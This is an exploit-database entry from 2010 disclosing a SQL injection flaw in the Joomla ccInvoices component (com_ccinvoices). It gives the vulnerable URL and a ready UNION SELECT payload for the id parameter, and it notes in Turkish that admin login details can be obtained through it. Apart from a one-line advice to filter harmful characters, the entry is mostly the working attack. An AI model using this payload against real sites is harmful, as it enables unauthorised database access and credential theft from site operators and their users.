Joomla ccInvoices Component (com_ccinvoices) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla ccInvoices Component (com_ccinvoices) SQL Injection Vulnerability
# Published : 2010-11-05
# Author : Fl0riX
# Previous Title : Joomla Component (com_ckforms) Local File Inclusion Vulnerability
# Next Title : IBM OmniFind CSRF Vulnerability

<------------------- header data start ------------------- >
#############################################################
Joomla Component ccinvoices SQL Injection Vulnerability                                      
#############################################################

# Author        : Fl0riX ~ Bug Researchers

# Name : Joomla com_ccinvoices

# Bug Type : SQL injection

# Infection : Admin Login Bilgileri Alinabilir.

# Vendor: http://www.chillcreations.com/

# Demo Vuln :
[+]index.php?option=com_ccinvoices&task=viewInv&id=[EXPLOIT]

# Note: register in site & Login with ur account.

# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
null+and+1=0+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
< -- bug code end of -- >